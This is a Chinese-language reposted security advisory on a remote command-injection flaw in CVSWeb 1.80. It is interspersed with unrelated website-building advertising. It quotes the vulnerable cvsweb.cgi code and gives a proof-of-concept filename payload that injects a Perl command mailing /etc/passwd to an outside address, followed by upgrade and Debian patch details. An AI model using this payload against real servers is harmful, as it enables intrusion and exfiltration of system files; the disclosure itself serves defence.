CVSWeb远程攻击漏洞精简版

此文章主要讲述的是CVSWeb远程攻击漏洞,我前两天在相关网站看见CVSWeb远程攻击漏洞的资料，觉得挺好，就拿出来供大家分享,以下就是文章的详细内容介绍，希望会给你带来一些帮助在此方面。

十多年的济宁网站建设经验，针对设计、前端、开发、售后、文案、推广等六对一服务，响应快，48小时及时工作处理。营销型网站的优势是能够根据用户设备显示端的尺寸不同，自动调整济宁建站的显示方式，使网站能够适用不同显示终端，在浏览器中调整网站的宽度，无论在任何一种浏览器上浏览网站，都能展现优雅布局与设计，从而大程度地提升浏览体验。创新互联公司从事“济宁网站设计”,“济宁网站推广”以来，每个客户项目都认真落实执行。

受影响系统：

CVSWeb Developer CVSWeb 1.80

不受影响系统：

CVSWeb Developer CVSWeb 1.89

CVSWeb Developer CVSWeb 1.86

描述：

Cvsweb 1.80包含一个安全远程攻击漏洞，如果攻击者对cvs库有写权限，他就可以远程获得对cvs server的

shell访问权限。出问题的代码在cvsweb.cgi中：

open($fh, "rlog '$filenames' 2>/dev/null |")

攻击者通过建立一个特殊的文件名，来发动攻击。

<* 来源： Wizdumb *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负!

攻击者会首先按照下列步骤操作：

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"

touch $SHELLCODE

cvs add $SHELLCODE

cvs commit -m '' $SHELLCODE

然后攻击者会访问cvsweb页面，浏览他设置木马文件的目录。这将导致/etc/passwd 文件被

发送给攻击者，当然攻击者也可以执行其他的命令。

建议：

升级到1.86或者更高版本，下载地址：

http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

[ Debian Linux ]

Debian GNU/Linux 2.1 alias slink

源码包：

http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc

MD5 checksum: b1810728310882fb72078674521ee369

http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz

MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702

以上的相关内容就是对CVSWeb远程攻击漏洞的介绍，望你能有所收获。

网站题目：CVSWeb远程攻击漏洞精简版
转载来源：http://www.shufengxianlan.com/qtweb/news12/225762.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联